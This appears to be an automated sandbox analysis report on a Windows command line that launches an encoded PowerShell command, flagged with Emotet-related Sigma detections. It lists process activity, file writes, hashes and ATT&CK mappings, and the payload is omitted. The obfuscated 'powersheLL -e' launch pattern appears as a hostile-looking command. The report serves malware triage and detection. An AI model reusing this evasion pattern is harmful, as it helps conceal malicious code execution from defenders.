ID: 281116
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 15:00:02
Date: 02/09/2020
Version: 29.0.0 Ocean Jasper
Table of Contents
Table of Contents 2
Analysis Report 4
Overview 4
General Information 4
Detection 4
Signatures 4
Classification 4
Startup 4
Malware Configuration 5
Yara Overview 6
Sigma Overview 6
System Summary: 6
Signature Overview 6
E-Banking Fraud: 6
System Summary: 6
Data Obfuscation: 6
HIPS / PFW / Operating System Protection Evasion: 6
Mitre Att&ck Matrix 6
Behavior Graph 7
Screenshots 7
Thumbnails 7
Antivirus, Machine Learning and Genetic Malware Detection 8
Initial Sample 8
Dropped Files 8
Unpacked PE Files 8
Domains 8
URLs 8
Domains and IPs 8
Contacted Domains 9
Contacted IPs 9
General Information 9
Simulations 9
Behavior and APIs 9
Joe Sandbox View / Context 9
IPs 9
Domains 9
ASN 10
JA3 Fingerprints 10
Dropped Files 10
Created / dropped Files 10
Static File Info 10
No static file info 10
Network Behavior 10
Code Manipulations 10
Statistics 10
Behavior 10
System Behavior 11
Analysis Process: cmd.exe PID: 6904 Parent PID: 4608 11
General 11
File Activities 12
Analysis Process: conhost.exe PID: 6912 Parent PID: 6904 13
General 13
Analysis Process: powershell.exe PID: 6956 Parent PID: 6904 13
General 13
File Activities 14
File Created 14
Copyright null 2020 Page 2 of 16
File Written 15
File Read 15
Disassembly 16
Analysis Report
Overview
General Information
Analysis ID: 281116
Most interesting Screenshot: (screenshot not reproduced)
Detection
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious encrypted Powershell command line found
Sigma detected: Emotet Process Creation
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mo…
Enables debug privileges
May sleep (evasive loops) to hinder …
Queries the volume information (name …
Very long cmdline option found, this …
Classification
Radar chart (not reproduced); axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; scale: clean, suspicious, malicious
Startup
System is w10x64
cmd.exe (PID: 6904 cmdline: cmd /C 'powersheLL -e [base64-encoded command omitted]' MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 6956 cmdline: powersheLL -e [base64-encoded command omitted] MD5: DBA3E6449E97D4E3DF64527EF7012A10)
cleanup
Malware Configuration
No configs have been found
Yara Overview
No yara matches
Sigma Overview
System Summary:
Sigma detected: Emotet Process Creation
Sigma detected: Suspicious Encoded PowerShell Command Line
Signature Overview
• E-Banking Fraud • System Summary • Data Obfuscation • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Anti Debugging • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection
E-Banking Fraud:
Malicious encrypted Powershell command line found
System Summary:
Very long command line found
Data Obfuscation:
PowerShell case anomaly found
HIPS / PFW / Operating System Protection Evasion:
Encrypted powershell cmdline option found
Mitre Att&ck Matrix
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts
Execution: Command and Scripting Interpreter 1 1 | PowerShell 3 | At (Linux) | At (Windows)
Persistence: Path Interception | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac)
Privilege Escalation: Process Injection 1 1 | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac)
Defense Evasion: Masquerading 1 | Virtualization/Sandbox Evasion 2 | Process Injection 1 1 | Deobfuscate/Decode Files or Information 1
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS
Discovery: Virtualization/Sandbox Evasion 2 | Process Discovery 1 | System Information Discovery 1 1 | System Network Configuration Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model
Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Scheduled Transfer
Command and Control: Data Obfuscation | Junk Data | Steganography | Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location | SIM Card Swap
Behavior Graph
Behavior graph (rendered graph not reproduced; labels recovered from the figure)
Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Is malicious, Internet, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language
ID: 281116
Cookbook: defaultwindowscmdlinecookbook.jbs
Startdate: 02/09/2020
Architecture: WINDOWS
Score: 72
Processes shown: cmd.exe started powershell.exe and conhost.exe
Signatures shown at cmd.exe: Malicious encrypted Powershell command line found; Sigma detected: Emotet Process Creation; Very long command line found; 3 other signatures
Signatures shown at powershell.exe: Malicious encrypted Powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Domains and IPs
Contacted Domains
No contacted domains info
Contacted IPs
No contacted IP info
General Information
Joe Sandbox Version: 29.0.0 Ocean Jasper
Analysis ID: 281116
Start date: 02.09.2020
Start time: 15:00:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 1m 47s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.bank.evad.win@4/1@0/0
Cookbook Comments: Adjust boot time; Enable AMSI; Stop behavior analysis, all processes terminated
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 728
Entropy (8bit): 5.05097364910619
Encrypted: false
MD5: 900997B3FF6514BF775CAC6FFCBB6D4B
SHA1: CED01BFEE8A92DE7946C57AA3A8B9F043708E3D7
SHA-256: 740D9FC7EBE38ED3CCBB029A5592E89128F86039BABC8FEAA0CF1376201850C2
SHA-512: 3B408E288656F51077BF8104B5A02C68E34954213ECD75D45588747A5C03E5572CB7EFF6DC5A27625A4C93D6FA185260324E0BE9B387DBF48656F1044010D4E2
Malicious: false
Reputation: low
Preview: @...e...... H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Management.Automati on4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microso ft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN......
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
• cmd.exe • conhost.exe • powershell.exe
System Behavior
Analysis Process: cmd.exe PID: 6904 Parent PID: 4608
General
Start time: 15:00:47
Start date: 02/09/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C 'powersheLL -e [base64-encoded command omitted]'
Imagebase: 0x1320000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Analysis Process: conhost.exe PID: 6912 Parent PID: 6904
General
Start time: 15:00:47
Start date: 02/09/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66fd50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Analysis Process: powershell.exe PID: 6956 Parent PID: 6904
General
Start time: 15:00:48
Start date: 02/09/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powersheLL -e [base64-encoded command omitted]
Imagebase: 0x1260000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high
File Activities
File Created
Columns: Source | File Path | Access | Attributes | Options | Completion | Count | Address | Symbol

File Path: C:\Users\user
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1 | Address: 6DE0CF06 | Symbol: unknown

File Path: C:\Users\user\AppData\Roaming
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1 | Address: 6DE0CF06 | Symbol: unknown

File Path: C:\Windows\system32\catroot
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1 | Address: 6C8E5B28 | Symbol: unknown

File Path: C:\Windows\system32\catroot2
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1 | Address: 6C8E5B28 | Symbol: unknown

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Access: read attributes | synchronize | generic write
Attributes: device
Options: synchronous io non alert | non directory file
Completion: success or wait
Count: 1 | Address: 6DFD1926 | Symbol: CreateFileW
File Written
Columns: Source | File Path | Offset | Length | Value | Ascii | Completion | Count | Address | Symbol

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 64
Value: 40 00 00 01 65 00 00 00 00 00 00 00 0a 00 00 00 05 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Ascii: @...e......
Completion: success or wait | Count: 1 | Address: 6E0D76FC | Symbol: WriteFile

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 40
Value: 48 00 00 02 03 00 00 00 00 00 00 00 01 00 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00
Ascii: H...... <@.^...L."My.. .:......
Completion: success or wait | Count: 10 | Address: 6E0D76FC | Symbol: WriteFile

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 32
Value: 4d 69 63 72 6f 73 6f 66 74 2e 50 6f 77 65 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74
Ascii: Microsoft.PowerShell.ConsoleHost
Completion: success or wait | Count: 10 | Address: 6E0D76FC | Symbol: WriteFile

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 1
Value: 00
Ascii: .
Completion: success or wait | Count: 7 | Address: 6E0D76FC | Symbol: WriteFile

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 4
Value: 40 00 00 03
Ascii: @...
Completion: success or wait | Count: 1 | Address: 6E0D76FC | Symbol: WriteFile

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Offset: unknown | Length: 60
Value: 00 0e 80 00 01 0e 80 00 02 0e 80 00 03 0e 80 00 04 0e 80 00 05 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 54 01 40 00 f9 3e 40 01 47 01 40 00 da 00 40 00 0e 40 40 01
Ascii: ...... ...... T.@..>@.G.@...@.. @@.
Completion: success or wait | Count: 1 | Address: 6E0D76FC | Symbol: WriteFile
File Read
Source | File Path | Offset | Length | Completion | Count | Address | Symbol
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux | unknown | 176 | success or wait | 1 | 6DD403DE | ReadFile
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDECA54 | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDECA54 | ReadFile
| C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux | unknown | 900 | success or wait | 1 | 6DD403DE | ReadFile
| C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux | unknown | 620 | success or wait | 1 | 6DD403DE | ReadFile
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
| C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux | unknown | 748 | success or wait | 1 | 6DD403DE | ReadFile
| C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux | unknown | 748 | success or wait | 1 | 6DD403DE | ReadFile
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 2 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4121 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4253 | success or wait | 1 | 6DDE5705 | unknown
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 8171 | end of file | 1 | 6DDE5705 | unknown
Disassembly